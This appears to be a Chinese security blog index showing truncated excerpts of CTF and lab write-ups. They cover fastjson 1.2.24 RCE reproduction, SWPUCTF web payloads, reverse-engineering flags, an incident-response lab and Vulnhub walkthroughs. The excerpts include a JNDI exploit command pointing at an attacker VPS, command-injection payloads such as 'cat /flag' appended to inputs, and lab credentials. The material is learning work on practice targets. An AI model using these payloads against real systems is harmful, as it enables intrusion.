漏洞复现-fastjson复现1.2.24 RCE漏洞:RCE
本次复现采用docker搭建。
12cd vulhub/fastjson/1.2.24-rcedocker-compose up -d
打开 http://192.168.154.131:8090/,发现有两个数据,具体不知道有什么用。
img
抓包看看
img
发包后发现回显是刚刚网页显示的,把数据复制下来利用post请求修改数据然后发包。
img
发现数据可以修改。
这里就需要涉及到一个知识点JNDI。
从github上找到了一个jndi利用工具:
1234java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [vpsip] -C [command]# -A:指定ip地址# -C:需要执行的命令
img
构造数据包
123456789101112131415161718POST / HTTP/1.1Host: 靶机urlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/ ...
SWPUCTF
未读SWPUCTF 2023web0x01 If_else注释掉然后构造payload就可以了。payload:url?check=1){eval(system(“cat /flag”));}/*
0x02 RCE-PLUSrce没有回显,那就重定向到文件访问就可以了。payload:url?cmd=cat /f*>1.txt
0x03 Pingpingpingphp特性,“]”后面的“.”不会被转换。payload:url?Ping[ip.exe=127.0.0.1;cat /flag
0x04 一键连接!全部数组绕过,然后data伪协议判断条件,最后执行命令。payload:get:url?md5_1[]=1&md5_2[]=0&sha1_1[]=1&sha1_2[]=0&new_player=data://text/plain,Welcome to NSSCTF!!!post:Nss=sy ...
ctfshow
未读七夕杯七夕杯-re-wp0x01 逆向签到看汇编就可以看到字符串,小端序倒序一下转字符串就解得了exp如下:
12345678910111213141516a = [0x5F,0x79,0x73,0x61,0x65,0x5F,0x73,0x69]b = [0x7B,0x77,0x6F,0x68,0x73,0x66,0x74,0x63]c = [0x5F,0x6E,0x67,0x69,0x73,0x5F,0x65,0x72]a.reverse()b.reverse()c.reverse()flag = ""for i in b: flag += chr(i)for i in c: flag += chr(i)for i in a: flag += chr(i)print(flag+"}")# ctfshow{re_sign_is_easy_}
flag:ctfshow{re_sign_is_easy_}
0x02 eazy_magic非预期直接拿到md5解密网站解密,可能是解出来的人多了一下子就出来 ...
buuctf
未读BUUCTF-RE这里是buuctf平台的逆向的练习,我会在这里发布一些关于buuctf逆向题的解题思路,算是学习吧。因为我二进制不是很好,所以抽了点时间来做一些题来学习。
0x01 easyre签到题,idea打开就看到flag了。
flag:flag{this_Is_a_EaSyRe}
0x02 reverse1ida打开文件就看flag了,也是一道签到
flag:flag{hello_world}
0x03 reverse2ida打开,找到main函数,关键代码:
123456 for ( i = 0; i <= strlen(&flag); ++i ) { if ( *(&flag + i) == 105 || *(&flag + i) == 114 ) *(&flag + i) = 49; }}
做了一个简单的替换,写脚本跑出来就可以了:
12345678910flag = list('hacking_for_fun} ...
应急响应靶场练习
win2008第一次做应急响应的靶机哈哈,感受一下,这个是夏令营的老师给的靶机,我也是跟着老师一步步做的,防止忘记就写了这篇文章,方便以后查看。
后门检测nmap扫描到了ip
1234567Nmap scan report for 192.168.1.153 (192.168.1.153)Host is up (0.00033s latency).Not shown: 998 filtered tcp ports (no-response)PORT STATE SERVICE3389/tcp open ms-wbt-server49154/tcp open unknownMAC Address: 00:0C:29:2A:53:D2 (VMware)
可以看到3389端口是开着的,那么可以进行远程桌面,利用老师给的账号密码登录上去
12administratorwhoami123!@#
为了方便接下来应急工具的使用,这里需要建立一个共享文件:
1rdesktop 192.168.1.153 -r disk:LinuxPictures=~/桌面
然后 ...
Vulnhub靶场-hackme
今天开始记录一下Vulnhub的靶机渗透流程以及思路。就以hackme系列开始,这也是学长教我打的第一个靶机。靶机的安装和配置这里就不说了,要把靶机的设置成kali一样的网段。
hackme首先第一步就是打开kali跟靶机,kali利用nmap扫同一网段,这里我的是192.168.1.0/24。
123kali:192.168.1.138靶机:192.168.1.139
记录玩ip地址之后,发现靶机的80端口开着,那么kali浏览器访问http://192.168.1.139。
SQL注入发现是一个登陆页面,右下角还有个注册页面,我们注册一个账号登录进去。
进去之后,可以看到有一个窗口,经过测试是可以查询一些书和作者的,这里手工注入,先来试试sql注入。发现一般的sql注入语句执行不了,根据查询的内容推断后台的sql语句应该为:
1sql = "select Title from BOOK like %".$content."limit 0,1";
尝试构造payload为:
1Linux% ...
Vulnhub靶场-Pinky’s Palace v3
在夏令营做的一个靶机,还是挺有意思的,也就做了我一天而已(菜没办法),这个靶机是当时夏令营老师布置的一道题,但是后面实在不会做就去网上搜了wp,才知道原型是Pinky’s Palace v3。
Pinky’s Palace v3(flag在文章尾)
打开靶机和kali,将靶机和kali设为同一网段。
nmap扫到靶机ip为
12kali:192.168.1.138靶机:192.168.1.155
rce发现靶机的8000、3333、21端口开着,于是访问192.168.1.155:8000(3333端口无法访问)。是一个drupal的登录页面,尝试注册登录发现无法登录。于是爆破路径,发现了很多文件,找了一个有价值的文件:CHANGELOG.txt,内容是drupal的版本是7.57。
于是在kali上使用命令searchsploit查看对应的exp
123456789101112131415161718searchsploit drupal 7.57-------------------------------------- - ...
Vulnhub靶场-hackme2
hackme2的续集——hackme2,今天闲来无事就来做做。
hackme2
靶机练习
未读红日靶场二红日靶场二启动!!!
环境搭建官方下载地址以及实验文档如下:
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
跟靶场一中的环境类似需要模拟内网和外网两个网段。
Kali配置如下:
1网络适配器:NAT
PC配置如下:
12网络适配器:NAT网络适配器:仅主机模式
WEB配置如下:
12网络适配器:NAT网络适配器:仅主机模式
DC(域控)配置如下:
1网络适配器:仅主机模式
需要对虚拟网络适配器进行调整,设置一个192.168.111.0网段的和10.10.10.0网段的。
网络配置完成,这三台虚拟主机默认开机密码都是:密码1qaz@WSX。注意WEB的这台服务器,切换用户de1ay或者管理员用户administrator,密码也是1qaz@WSX。
开启服务
进入WEB,在如下路径开启Weblogic服务。
1C:\Oracle\Middleware\user_projects\domains\base_domain\bin
右键以管理员身份运行startWebLogic
至此环境就算配置完成了。
ip如下:
...
靶机练习
未读红日靶场一参考文章:https://blog.csdn.net/qq_41821603/article/details/109948920
https://blog.csdn.net/Redredredfish/article/details/119864263
红日系列的第一个靶场,闲暇之余来打一下。
环境配置虚拟网络适配器需要仅主机模式和NAT的两张网卡,设置成192.168.52.0/24,172.16.12.0/24两网段。
kali
1172.16.12.129
win7
12172.16.12.128192.168.52.143
win2008
1192.168.52.138
win2k3
1192.168.52.141
从上面可以看出,win2008和win2k3是内网靶机,跳板机就是win7。除了上述的环境配置,还需要去win7打开phpstudy。
phpstudy的位置
1C:\phpstudy
运行即可,接下来我会从三个方面来进行漏洞的利用,分别是phpmyadmin,yxcms,MS17-010。
phpMyAdmin首先要了解mysq ...